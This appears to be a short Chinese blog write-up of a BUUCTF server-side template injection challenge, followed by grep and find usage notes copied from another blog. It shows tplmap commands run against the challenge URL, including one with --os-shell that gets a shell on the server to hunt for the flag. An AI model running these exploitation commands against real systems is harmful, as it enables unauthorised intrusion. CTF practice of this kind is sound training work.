buuctf 刷題記錄 [第三章 web進階]SSTI

一打開就password wrong

根據提示ssti

Try

自動化

這里用了個自動化工具

tplmap

python2 tplmap.py -u "http://33fa6caa-d0a0-44e7-8dd8-e244ff6d05fb.node3.buuoj.cn/?password="

python2 tplmap.py -u "http://33fa6caa-d0a0-44e7-8dd8-e244ff6d05fb.node3.buuoj.cn/?password=" --os-shell

這里我用--os-shell的時候有個bug，就是無法進入目錄不過直接ls + 目錄就可以

這里根據常規的python ssti的套路就是在server文件里面

當然也可以手工找

比如我用find就沒有找到。。。

當然用的是find / -name flag沒有找到，其實可以使用搜索指定內容的查找方式

轉載來自：https://www.cnblogs.com/linjiqin/p/11678012.html

##文件名+內容
grep -r "查詢內容"  文件目錄  ##根據時間查找日志  grep '2020-02-27 17:5[6,9]' xinyar-erp-auto.log  ##查詢指定時間段內的日志  eg、grep -E '2020-02-27 14:5[5-9]|2020-02-28 15:0[0-5]' xinyar-erp-auto.log  ##查找關鍵字  grep -C 10 'aaaa' nohup.out    

##只顯示包含內容的文件名
grep -r -l "查詢內容"  文件目錄

##文件名+內容  
find 文件目錄  -type f |xargs grep "查詢內容"; 

eg：
grep -r "version.app.xinyartech.com"  /data/nginx/conf.d
grep -r -l "version.app.xinyartech.com"  /data/nginx/conf.d
find /data/nginx/conf.d  -type f |xargs grep "version.app.xinyartech.com";